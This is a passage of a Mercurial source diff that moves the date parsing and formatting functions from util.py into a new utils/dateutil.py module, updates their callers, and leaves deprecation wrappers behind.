211 212 seconds: "2009-08-18 13:00:13 +0200". See also the rfc3339date
212 213 filter.
213 214 """
214 return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2')
215 return dateutil.datestr(text, '%Y-%m-%d %H:%M:%S %1%2')
215 216
216 217 def indent(text, prefix):
217 218 '''indent each non-empty line of text after first with prefix.'''
@@ -325,14 +326,14 b' def rfc3339date(text):'
325 326 """Date. Returns a date using the Internet date format
326 327 specified in RFC 3339: "2009-08-18T13:00:13+02:00".
327 328 """
328 return util.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2")
329 return dateutil.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2")
329 330
330 331 @templatefilter('rfc822date')
331 332 def rfc822date(text):
332 333 """Date. Returns a date using the same format used in email
333 334 headers: "Tue, 18 Aug 2009 13:00:13 +0200".
334 335 """
335 return util.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2")
336 return dateutil.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2")
336 337
337 338 @templatefilter('short')
338 339 def short(text):
@@ -353,7 +354,7 b' def shortbisect(text):'
353 354 @templatefilter('shortdate')
354 355 def shortdate(text):
355 356 """Date. Returns a date like "2006-09-18"."""
356 return util.shortdate(text)
357 return dateutil.shortdate(text)
357 358
358 359 @templatefilter('slashpath')
359 360 def slashpath(path):
@@ -29,6 +29,7 b' from . import ('
29 29 templatekw,
30 30 util,
31 31 )
32 from .utils import dateutil
32 33
33 34 class ResourceUnavailable(error.Abort):
34 35 pass
@@ -649,9 +650,9 b' def date(context, mapping, args):'
649 650 fmt = evalstring(context, mapping, args[1])
650 651 try:
651 652 if fmt is None:
652 return util.datestr(date)
653 return dateutil.datestr(date)
653 654 else:
654 return util.datestr(date, fmt)
655 return dateutil.datestr(date, fmt)
655 656 except (TypeError, ValueError):
656 657 # i18n: "date" is a keyword
657 658 raise error.ParseError(_("date expects a date information"))
@@ -954,7 +955,7 b' def localdate(context, mapping, args):'
954 955
955 956 date = evalfuncarg(context, mapping, args[0])
956 957 try:
957 date = util.parsedate(date)
958 date = dateutil.parsedate(date)
958 959 except AttributeError: # not str nor date tuple
959 960 # i18n: "localdate" is a keyword
960 961 raise error.ParseError(_("localdate expects a date information"))
@@ -962,7 +963,7 b' def localdate(context, mapping, args):'
962 963 tzoffset = None
963 964 tz = evalfuncarg(context, mapping, args[1])
964 965 if isinstance(tz, bytes):
965 tzoffset, remainder = util.parsetimezone(tz)
966 tzoffset, remainder = dateutil.parsetimezone(tz)
966 967 if remainder:
967 968 tzoffset = None
968 969 if tzoffset is None:
@@ -972,7 +973,7 b' def localdate(context, mapping, args):'
972 973 # i18n: "localdate" is a keyword
973 974 raise error.ParseError(_("localdate expects a timezone"))
974 975 else:
975 tzoffset = util.makedate()[1]
976 tzoffset = dateutil.makedate()[1]
976 977 return (date[0], tzoffset)
977 978
978 979 @templatefunc('max(iterable)')
@@ -37,6 +37,7 b' from . import ('
37 37 scmutil,
38 38 util,
39 39 )
40 from .utils import dateutil
40 41
41 42 urlreq = util.urlreq
42 43
@@ -714,7 +715,7 b' class ui(object):'
714 715 (0, 0)
715 716 """
716 717 if self.config(section, name, default, untrusted):
717 return self.configwith(util.parsedate, section, name, default,
718 return self.configwith(dateutil.parsedate, section, name, default,
718 719 'date', untrusted)
719 720 if default is _unset:
720 721 return None
@@ -17,11 +17,9 b' from __future__ import absolute_import, '
17 17
18 18 import abc
19 19 import bz2
20 import calendar
21 20 import codecs
22 21 import collections
23 22 import contextlib
24 import datetime
25 23 import errno
26 24 import gc
27 25 import hashlib
@@ -55,6 +53,7 b' from . import ('
55 53 pycompat,
56 54 urllibcompat,
57 55 )
56 from .utils import dateutil
58 57
59 58 base85 = policy.importmod(r'base85')
60 59 osutil = policy.importmod(r'osutil')
@@ -855,48 +854,6 b' def versiontuple(v=None, n=4):'
855 854 if n == 4:
856 855 return (vints[0], vints[1], vints[2], extra)
857 856
858 # used by parsedate
859 defaultdateformats = (
860 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
861 '%Y-%m-%dT%H:%M', # without seconds
862 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
863 '%Y-%m-%dT%H%M', # without seconds
864 '%Y-%m-%d %H:%M:%S', # our common legal variant
865 '%Y-%m-%d %H:%M', # without seconds
866 '%Y-%m-%d %H%M%S', # without :
867 '%Y-%m-%d %H%M', # without seconds
868 '%Y-%m-%d %I:%M:%S%p',
869 '%Y-%m-%d %H:%M',
870 '%Y-%m-%d %I:%M%p',
871 '%Y-%m-%d',
872 '%m-%d',
873 '%m/%d',
874 '%m/%d/%y',
875 '%m/%d/%Y',
876 '%a %b %d %H:%M:%S %Y',
877 '%a %b %d %I:%M:%S%p %Y',
878 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
879 '%b %d %H:%M:%S %Y',
880 '%b %d %I:%M:%S%p %Y',
881 '%b %d %H:%M:%S',
882 '%b %d %I:%M:%S%p',
883 '%b %d %H:%M',
884 '%b %d %I:%M%p',
885 '%b %d %Y',
886 '%b %d',
887 '%H:%M:%S',
888 '%I:%M:%S%p',
889 '%H:%M',
890 '%I:%M%p',
891 )
892
893 extendeddateformats = defaultdateformats + (
894 "%Y",
895 "%Y-%m",
896 "%b",
897 "%b %Y",
898 )
899
900 857 def cachefunc(func):
901 858 '''cache the result of function calls'''
902 859 # XXX doesn't handle keywords args
@@ -2304,277 +2261,6 b' class cappedreader(object):'
2304 2261
2305 2262 return data
2306 2263
2307 def makedate(timestamp=None):
2308 '''Return a unix timestamp (or the current time) as a (unixtime,
2309 offset) tuple based off the local timezone.'''
2310 if timestamp is None:
2311 timestamp = time.time()
2312 if timestamp < 0:
2313 hint = _("check your clock")
2314 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2315 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2316 datetime.datetime.fromtimestamp(timestamp))
2317 tz = delta.days * 86400 + delta.seconds
2318 return timestamp, tz
2319
2320 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2321 """represent a (unixtime, offset) tuple as a localized time.
2322 unixtime is seconds since the epoch, and offset is the time zone's
2323 number of seconds away from UTC.
2324
2325 >>> datestr((0, 0))
2326 'Thu Jan 01 00:00:00 1970 +0000'
2327 >>> datestr((42, 0))
2328 'Thu Jan 01 00:00:42 1970 +0000'
2329 >>> datestr((-42, 0))
2330 'Wed Dec 31 23:59:18 1969 +0000'
2331 >>> datestr((0x7fffffff, 0))
2332 'Tue Jan 19 03:14:07 2038 +0000'
2333 >>> datestr((-0x80000000, 0))
2334 'Fri Dec 13 20:45:52 1901 +0000'
2335 """
2336 t, tz = date or makedate()
2337 if "%1" in format or "%2" in format or "%z" in format:
2338 sign = (tz > 0) and "-" or "+"
2339 minutes = abs(tz) // 60
2340 q, r = divmod(minutes, 60)
2341 format = format.replace("%z", "%1%2")
2342 format = format.replace("%1", "%c%02d" % (sign, q))
2343 format = format.replace("%2", "%02d" % r)
2344 d = t - tz
2345 if d > 0x7fffffff:
2346 d = 0x7fffffff
2347 elif d < -0x80000000:
2348 d = -0x80000000
2349 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2350 # because they use the gmtime() system call which is buggy on Windows
2351 # for negative values.
2352 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2353 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2354 return s
2355
2356 def shortdate(date=None):
2357 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2358 return datestr(date, format='%Y-%m-%d')
2359
2360 def parsetimezone(s):
2361 """find a trailing timezone, if any, in string, and return a
2362 (offset, remainder) pair"""
2363 s = pycompat.bytestr(s)
2364
2365 if s.endswith("GMT") or s.endswith("UTC"):
2366 return 0, s[:-3].rstrip()
2367
2368 # Unix-style timezones [+-]hhmm
2369 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2370 sign = (s[-5] == "+") and 1 or -1
2371 hours = int(s[-4:-2])
2372 minutes = int(s[-2:])
2373 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2374
2375 # ISO8601 trailing Z
2376 if s.endswith("Z") and s[-2:-1].isdigit():
2377 return 0, s[:-1]
2378
2379 # ISO8601-style [+-]hh:mm
2380 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2381 s[-5:-3].isdigit() and s[-2:].isdigit()):
2382 sign = (s[-6] == "+") and 1 or -1
2383 hours = int(s[-5:-3])
2384 minutes = int(s[-2:])
2385 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2386
2387 return None, s
2388
2389 def strdate(string, format, defaults=None):
2390 """parse a localized time string and return a (unixtime, offset) tuple.
2391 if the string cannot be parsed, ValueError is raised."""
2392 if defaults is None:
2393 defaults = {}
2394
2395 # NOTE: unixtime = localunixtime + offset
2396 offset, date = parsetimezone(string)
2397
2398 # add missing elements from defaults
2399 usenow = False # default to using biased defaults
2400 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2401 part = pycompat.bytestr(part)
2402 found = [True for p in part if ("%"+p) in format]
2403 if not found:
2404 date += "@" + defaults[part][usenow]
2405 format += "@%" + part[0]
2406 else:
2407 # We've found a specific time element, less specific time
2408 # elements are relative to today
2409 usenow = True
2410
2411 timetuple = time.strptime(encoding.strfromlocal(date),
2412 encoding.strfromlocal(format))
2413 localunixtime = int(calendar.timegm(timetuple))
2414 if offset is None:
2415 # local timezone
2416 unixtime = int(time.mktime(timetuple))
2417 offset = unixtime - localunixtime
2418 else:
2419 unixtime = localunixtime + offset
2420 return unixtime, offset
2421
2422 def parsedate(date, formats=None, bias=None):
2423 """parse a localized date/time and return a (unixtime, offset) tuple.
2424
2425 The date may be a "unixtime offset" string or in one of the specified
2426 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2427
2428 >>> parsedate(b' today ') == parsedate(
2429 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2430 True
2431 >>> parsedate(b'yesterday ') == parsedate(
2432 ... (datetime.date.today() - datetime.timedelta(days=1)
2433 ... ).strftime('%b %d').encode('ascii'))
2434 True
2435 >>> now, tz = makedate()
2436 >>> strnow, strtz = parsedate(b'now')
2437 >>> (strnow - now) < 1
2438 True
2439 >>> tz == strtz
2440 True
2441 """
2442 if bias is None:
2443 bias = {}
2444 if not date:
2445 return 0, 0
2446 if isinstance(date, tuple) and len(date) == 2:
2447 return date
2448 if not formats:
2449 formats = defaultdateformats
2450 date = date.strip()
2451
2452 if date == 'now' or date == _('now'):
2453 return makedate()
2454 if date == 'today' or date == _('today'):
2455 date = datetime.date.today().strftime(r'%b %d')
2456 date = encoding.strtolocal(date)
2457 elif date == 'yesterday' or date == _('yesterday'):
2458 date = (datetime.date.today() -
2459 datetime.timedelta(days=1)).strftime(r'%b %d')
2460 date = encoding.strtolocal(date)
2461
2462 try:
2463 when, offset = map(int, date.split(' '))
2464 except ValueError:
2465 # fill out defaults
2466 now = makedate()
2467 defaults = {}
2468 for part in ("d", "mb", "yY", "HI", "M", "S"):
2469 # this piece is for rounding the specific end of unknowns
2470 b = bias.get(part)
2471 if b is None:
2472 if part[0:1] in "HMS":
2473 b = "00"
2474 else:
2475 b = "0"
2476
2477 # this piece is for matching the generic end to today's date
2478 n = datestr(now, "%" + part[0:1])
2479
2480 defaults[part] = (b, n)
2481
2482 for format in formats:
2483 try:
2484 when, offset = strdate(date, format, defaults)
2485 except (ValueError, OverflowError):
2486 pass
2487 else:
2488 break
2489 else:
2490 raise error.ParseError(
2491 _('invalid date: %r') % pycompat.bytestr(date))
2492 # validate explicit (probably user-specified) date and
2493 # time zone offset. values must fit in signed 32 bits for
2494 # current 32-bit linux runtimes. timezones go from UTC-12
2495 # to UTC+14
2496 if when < -0x80000000 or when > 0x7fffffff:
2497 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2498 if offset < -50400 or offset > 43200:
2499 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2500 return when, offset
2501
2502 def matchdate(date):
2503 """Return a function that matches a given date match specifier
2504
2505 Formats include:
2506
2507 '{date}' match a given date to the accuracy provided
2508
2509 '<{date}' on or before a given date
2510
2511 '>{date}' on or after a given date
2512
2513 >>> p1 = parsedate(b"10:29:59")
2514 >>> p2 = parsedate(b"10:30:00")
2515 >>> p3 = parsedate(b"10:30:59")
2516 >>> p4 = parsedate(b"10:31:00")
2517 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2518 >>> f = matchdate(b"10:30")
2519 >>> f(p1[0])
2520 False
2521 >>> f(p2[0])
2522 True
2523 >>> f(p3[0])
2524 True
2525 >>> f(p4[0])
2526 False
2527 >>> f(p5[0])
2528 False
2529 """
2530
2531 def lower(date):
2532 d = {'mb': "1", 'd': "1"}
2533 return parsedate(date, extendeddateformats, d)[0]
2534
2535 def upper(date):
2536 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2537 for days in ("31", "30", "29"):
2538 try:
2539 d["d"] = days
2540 return parsedate(date, extendeddateformats, d)[0]
2541 except error.ParseError:
2542 pass
2543 d["d"] = "28"
2544 return parsedate(date, extendeddateformats, d)[0]
2545
2546 date = date.strip()
2547
2548 if not date:
2549 raise Abort(_("dates cannot consist entirely of whitespace"))
2550 elif date[0] == "<":
2551 if not date[1:]:
2552 raise Abort(_("invalid day spec, use '<DATE'"))
2553 when = upper(date[1:])
2554 return lambda x: x <= when
2555 elif date[0] == ">":
2556 if not date[1:]:
2557 raise Abort(_("invalid day spec, use '>DATE'"))
2558 when = lower(date[1:])
2559 return lambda x: x >= when
2560 elif date[0] == "-":
2561 try:
2562 days = int(date[1:])
2563 except ValueError:
2564 raise Abort(_("invalid day spec: %s") % date[1:])
2565 if days < 0:
2566 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2567 % date[1:])
2568 when = makedate()[0] - days * 3600 * 24
2569 return lambda x: x >= when
2570 elif " to " in date:
2571 a, b = date.split(" to ")
2572 start, stop = lower(a), upper(b)
2573 return lambda x: x >= start and x <= stop
2574 else:
2575 start, stop = lower(date), upper(date)
2576 return lambda x: x >= start and x <= stop
2577
2578 2264 def stringmatcher(pattern, casesensitive=True):
2579 2265 """
2580 2266 accepts a string, possibly starting with 're:' or 'literal:' prefix.
@@ -4303,3 +3989,54 b' def uvarintdecodestream(fh):'
4303 3989 if not (byte & 0x80):
4304 3990 return result
4305 3991 shift += 7
3992
3993 ###
3994 # Deprecation warnings for util.py splitting
3995 ###
3996
3997 defaultdateformats = dateutil.defaultdateformats
3998
3999 extendeddateformats = dateutil.extendeddateformats
4000
4001 def makedate(*args, **kwargs):
4002 msg = ("'util.makedate' is deprecated, "
4003 "use 'utils.dateutil.makedate'")
4004 nouideprecwarn(msg, "4.6")
4005 return dateutil.makedate(*args, **kwargs)
4006
4007 def datestr(*args, **kwargs):
4008 msg = ("'util.datestr' is deprecated, "
4009 "use 'utils.dateutil.datestr'")
4010 nouideprecwarn(msg, "4.6")
4011 debugstacktrace()
4012 return dateutil.datestr(*args, **kwargs)
4013
4014 def shortdate(*args, **kwargs):
4015 msg = ("'util.shortdate' is deprecated, "
4016 "use 'utils.dateutil.shortdate'")
4017 nouideprecwarn(msg, "4.6")
4018 return dateutil.shortdate(*args, **kwargs)
4019
4020 def parsetimezone(*args, **kwargs):
4021 msg = ("'util.parsetimezone' is deprecated, "
4022 "use 'utils.dateutil.parsetimezone'")
4023 nouideprecwarn(msg, "4.6")
4024 return dateutil.parsetimezone(*args, **kwargs)
4025
4026 def strdate(*args, **kwargs):
4027 msg = ("'util.strdate' is deprecated, "
4028 "use 'utils.dateutil.strdate'")
4029 nouideprecwarn(msg, "4.6")
4030 return dateutil.strdate(*args, **kwargs)
4031
4032 def parsedate(*args, **kwargs):
4033 msg = ("'util.parsedate' is deprecated, "
4034 "use 'utils.dateutil.parsedate'")
4035 nouideprecwarn(msg, "4.6")
4036 return dateutil.parsedate(*args, **kwargs)
4037
4038 def matchdate(*args, **kwargs):
4039 msg = ("'util.matchdate' is deprecated, "
4040 "use 'utils.dateutil.matchdate'")
4041 nouideprecwarn(msg, "4.6")
4042 return dateutil.matchdate(*args, **kwargs)
This diff has been collapsed as it changes many lines, (3993 lines changed) Show them Hide them
@@ -1,860 +1,23 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions relative to dates
2 2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
3 # Copyright 2018 Boris Feld <boris.feld@octobus.net>
6 4 #
7 5 # This software may be used and distributed according to the terms of the
8 6 # GNU General Public License version 2 or any later version.
9 7
10 """Mercurial utility functions and platform specific implementations.
11
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
14 """
15
16 8 from __future__ import absolute_import, print_function
17 9
18 import abc
19 import bz2
20 10 import calendar
21 import codecs
22 import collections
23 import contextlib
24 11 import datetime
25 import errno
26 import gc
27 import hashlib
28 import imp
29 import io
30 import itertools
31 import mmap
32 import os
33 import platform as pyplatform
34 import re as remod
35 import shutil
36 import signal
37 import socket
38 import stat
39 import string
40 import subprocess
41 import sys
42 import tempfile
43 import textwrap
44 12 import time
45 import traceback
46 import warnings
47 import zlib
48 13
49 from . import (
14 from ..i18n import _
15 from .. import (
50 16 encoding,
51 17 error,
52 i18n,
53 node as nodemod,
54 policy,
55 18 pycompat,
56 urllibcompat,
57 19 )
58 20
59 base85 = policy.importmod(r'base85')
60 osutil = policy.importmod(r'osutil')
61 parsers = policy.importmod(r'parsers')
62
63 b85decode = base85.b85decode
64 b85encode = base85.b85encode
65
66 cookielib = pycompat.cookielib
67 empty = pycompat.empty
68 httplib = pycompat.httplib
69 pickle = pycompat.pickle
70 queue = pycompat.queue
71 socketserver = pycompat.socketserver
72 stderr = pycompat.stderr
73 stdin = pycompat.stdin
74 stdout = pycompat.stdout
75 stringio = pycompat.stringio
76 xmlrpclib = pycompat.xmlrpclib
77
78 httpserver = urllibcompat.httpserver
79 urlerr = urllibcompat.urlerr
80 urlreq = urllibcompat.urlreq
81
82 # workaround for win32mbcs
83 _filenamebytestr = pycompat.bytestr
84
85 def isatty(fp):
86 try:
87 return fp.isatty()
88 except AttributeError:
89 return False
90
91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # buffering
94 if isatty(stdout):
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96
97 if pycompat.iswindows:
98 from . import windows as platform
99 stdout = platform.winstdout(stdout)
100 else:
101 from . import posix as platform
102
103 _ = i18n._
104
105 bindunixsocket = platform.bindunixsocket
106 cachestat = platform.cachestat
107 checkexec = platform.checkexec
108 checklink = platform.checklink
109 copymode = platform.copymode
110 executablepath = platform.executablepath
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
123 isowner = platform.isowner
124 listdir = osutil.listdir
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
128 nlinks = platform.nlinks
129 normpath = platform.normpath
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
137 poll = platform.poll
138 popen = platform.popen
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
142 rename = platform.rename
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
145 samefile = platform.samefile
146 samestat = platform.samestat
147 setbinary = platform.setbinary
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
153 split = platform.split
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
157 statislink = platform.statislink
158 testpid = platform.testpid
159 umask = platform.umask
160 unlink = platform.unlink
161 username = platform.username
162
163 try:
164 recvfds = osutil.recvfds
165 except AttributeError:
166 pass
167 try:
168 setprocname = osutil.setprocname
169 except AttributeError:
170 pass
171 try:
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
174 pass
175
176 # Python compatibility
177
178 _notset = object()
179
180 # disable Python's problematic floating point timestamps (issue4836)
181 # (Python hypocritically says you shouldn't change this behavior in
182 # libraries, and sure enough Mercurial is not a library.)
183 os.stat_float_times(False)
184
185 def safehasattr(thing, attr):
186 return getattr(thing, attr, _notset) is not _notset
187
188 def _rapply(f, xs):
189 if xs is None:
190 # assume None means non-value of optional data
191 return xs
192 if isinstance(xs, (list, set, tuple)):
193 return type(xs)(_rapply(f, x) for x in xs)
194 if isinstance(xs, dict):
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 return f(xs)
197
198 def rapply(f, xs):
199 """Apply function recursively to every item preserving the data structure
200
201 >>> def f(x):
202 ... return 'f(%s)' % x
203 >>> rapply(f, None) is None
204 True
205 >>> rapply(f, 'a')
206 'f(a)'
207 >>> rapply(f, {'a'}) == {'f(a)'}
208 True
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211
212 >>> xs = [object()]
213 >>> rapply(pycompat.identity, xs) is xs
214 True
215 """
216 if f is pycompat.identity:
217 # fast path mainly for py2
218 return xs
219 return _rapply(f, xs)
220
221 def bytesinput(fin, fout, *args, **kwargs):
222 sin, sout = sys.stdin, sys.stdout
223 try:
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 finally:
227 sys.stdin, sys.stdout = sin, sout
228
229 def bitsfrom(container):
230 bits = 0
231 for bit in container:
232 bits |= bit
233 return bits
234
235 # python 2.6 still have deprecation warning enabled by default. We do not want
236 # to display anything to standard user so detect if we are running test and
237 # only use python deprecation warning in this case.
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 if _dowarn:
240 # explicitly unfilter our warning for python 2.7
241 #
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249 if _dowarn and pycompat.ispy3:
250 # silence warning emitted by passing user string to re.sub()
251 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
252 r'mercurial')
253
254 def nouideprecwarn(msg, version, stacklevel=1):
255 """Issue an python native deprecation warning
256
257 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
258 """
259 if _dowarn:
260 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
261 " update your code.)") % version
262 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
263
264 DIGESTS = {
265 'md5': hashlib.md5,
266 'sha1': hashlib.sha1,
267 'sha512': hashlib.sha512,
268 }
269 # List of digest types from strongest to weakest
270 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
271
272 for k in DIGESTS_BY_STRENGTH:
273 assert k in DIGESTS
274
275 class digester(object):
276 """helper to compute digests.
277
278 This helper can be used to compute one or more digests given their name.
279
280 >>> d = digester([b'md5', b'sha1'])
281 >>> d.update(b'foo')
282 >>> [k for k in sorted(d)]
283 ['md5', 'sha1']
284 >>> d[b'md5']
285 'acbd18db4cc2f85cedef654fccc4a4d8'
286 >>> d[b'sha1']
287 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
288 >>> digester.preferred([b'md5', b'sha1'])
289 'sha1'
290 """
291
292 def __init__(self, digests, s=''):
293 self._hashes = {}
294 for k in digests:
295 if k not in DIGESTS:
296 raise Abort(_('unknown digest type: %s') % k)
297 self._hashes[k] = DIGESTS[k]()
298 if s:
299 self.update(s)
300
301 def update(self, data):
302 for h in self._hashes.values():
303 h.update(data)
304
305 def __getitem__(self, key):
306 if key not in DIGESTS:
307 raise Abort(_('unknown digest type: %s') % k)
308 return nodemod.hex(self._hashes[key].digest())
309
310 def __iter__(self):
311 return iter(self._hashes)
312
313 @staticmethod
314 def preferred(supported):
315 """returns the strongest digest type in both supported and DIGESTS."""
316
317 for k in DIGESTS_BY_STRENGTH:
318 if k in supported:
319 return k
320 return None
321
322 class digestchecker(object):
323 """file handle wrapper that additionally checks content against a given
324 size and digests.
325
326 d = digestchecker(fh, size, {'md5': '...'})
327
328 When multiple digests are given, all of them are validated.
329 """
330
331 def __init__(self, fh, size, digests):
332 self._fh = fh
333 self._size = size
334 self._got = 0
335 self._digests = dict(digests)
336 self._digester = digester(self._digests.keys())
337
338 def read(self, length=-1):
339 content = self._fh.read(length)
340 self._digester.update(content)
341 self._got += len(content)
342 return content
343
344 def validate(self):
345 if self._size != self._got:
346 raise Abort(_('size mismatch: expected %d, got %d') %
347 (self._size, self._got))
348 for k, v in self._digests.items():
349 if v != self._digester[k]:
350 # i18n: first parameter is a digest name
351 raise Abort(_('%s mismatch: expected %s, got %s') %
352 (k, v, self._digester[k]))
353
354 try:
355 buffer = buffer
356 except NameError:
357 def buffer(sliceable, offset=0, length=None):
358 if length is not None:
359 return memoryview(sliceable)[offset:offset + length]
360 return memoryview(sliceable)[offset:]
361
362 closefds = pycompat.isposix
363
364 _chunksize = 4096
365
366 class bufferedinputpipe(object):
367 """a manually buffered input pipe
368
369 Python will not let us use buffered IO and lazy reading with 'polling' at
370 the same time. We cannot probe the buffer state and select will not detect
371 that data are ready to read if they are already buffered.
372
373 This class let us work around that by implementing its own buffering
374 (allowing efficient readline) while offering a way to know if the buffer is
375 empty from the output (allowing collaboration of the buffer with polling).
376
377 This class lives in the 'util' module because it makes use of the 'os'
378 module from the python stdlib.
379 """
380 def __new__(cls, fh):
381 # If we receive a fileobjectproxy, we need to use a variation of this
382 # class that notifies observers about activity.
383 if isinstance(fh, fileobjectproxy):
384 cls = observedbufferedinputpipe
385
386 return super(bufferedinputpipe, cls).__new__(cls)
387
388 def __init__(self, input):
389 self._input = input
390 self._buffer = []
391 self._eof = False
392 self._lenbuf = 0
393
394 @property
395 def hasbuffer(self):
396 """True is any data is currently buffered
397
398 This will be used externally a pre-step for polling IO. If there is
399 already data then no polling should be set in place."""
400 return bool(self._buffer)
401
402 @property
403 def closed(self):
404 return self._input.closed
405
406 def fileno(self):
407 return self._input.fileno()
408
409 def close(self):
410 return self._input.close()
411
412 def read(self, size):
413 while (not self._eof) and (self._lenbuf < size):
414 self._fillbuffer()
415 return self._frombuffer(size)
416
417 def readline(self, *args, **kwargs):
418 if 1 < len(self._buffer):
419 # this should not happen because both read and readline end with a
420 # _frombuffer call that collapse it.
421 self._buffer = [''.join(self._buffer)]
422 self._lenbuf = len(self._buffer[0])
423 lfi = -1
424 if self._buffer:
425 lfi = self._buffer[-1].find('\n')
426 while (not self._eof) and lfi < 0:
427 self._fillbuffer()
428 if self._buffer:
429 lfi = self._buffer[-1].find('\n')
430 size = lfi + 1
431 if lfi < 0: # end of file
432 size = self._lenbuf
433 elif 1 < len(self._buffer):
434 # we need to take previous chunks into account
435 size += self._lenbuf - len(self._buffer[-1])
436 return self._frombuffer(size)
437
438 def _frombuffer(self, size):
439 """return at most 'size' data from the buffer
440
441 The data are removed from the buffer."""
442 if size == 0 or not self._buffer:
443 return ''
444 buf = self._buffer[0]
445 if 1 < len(self._buffer):
446 buf = ''.join(self._buffer)
447
448 data = buf[:size]
449 buf = buf[len(data):]
450 if buf:
451 self._buffer = [buf]
452 self._lenbuf = len(buf)
453 else:
454 self._buffer = []
455 self._lenbuf = 0
456 return data
457
458 def _fillbuffer(self):
459 """read data to the buffer"""
460 data = os.read(self._input.fileno(), _chunksize)
461 if not data:
462 self._eof = True
463 else:
464 self._lenbuf += len(data)
465 self._buffer.append(data)
466
467 return data
468
469 def mmapread(fp):
470 try:
471 fd = getattr(fp, 'fileno', lambda: fp)()
472 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
473 except ValueError:
474 # Empty files cannot be mmapped, but mmapread should still work. Check
475 # if the file is empty, and if so, return an empty buffer.
476 if os.fstat(fd).st_size == 0:
477 return ''
478 raise
479
480 def popen2(cmd, env=None, newlines=False):
481 # Setting bufsize to -1 lets the system decide the buffer size.
482 # The default for bufsize is 0, meaning unbuffered. This leads to
483 # poor performance on Mac OS X: http://bugs.python.org/issue4194
484 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
485 close_fds=closefds,
486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 universal_newlines=newlines,
488 env=env)
489 return p.stdin, p.stdout
490
491 def popen3(cmd, env=None, newlines=False):
492 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
493 return stdin, stdout, stderr
494
495 def popen4(cmd, env=None, newlines=False, bufsize=-1):
496 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
497 close_fds=closefds,
498 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
499 stderr=subprocess.PIPE,
